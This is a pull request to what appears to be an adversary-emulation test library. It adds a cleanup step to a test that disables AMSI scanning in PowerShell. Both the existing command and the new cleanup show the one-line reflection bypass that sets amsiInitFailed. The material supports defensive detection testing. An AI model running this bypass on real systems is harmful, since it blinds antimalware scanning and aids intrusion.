### PR TITLE
Update T1089 - AMSI Bypass cleanup

### DIFF
--- a/atomics/T1089/T1089.yaml
+++ b/atomics/T1089/T1089.yaml
@@ -163,3 +163,5 @@ atomic_tests:
     elevation_required: false
     command: |
       [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
+    cleanup_command: |
+      [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)


### PR DESCRIPTION
Adding in a cleanup to set the amsiInitFails variable back to false

**Details:**
Cleanup the amsiInitFailed test

**Testing:**
Tested with Invoke-AtomicTest

**Associated Issues:**
None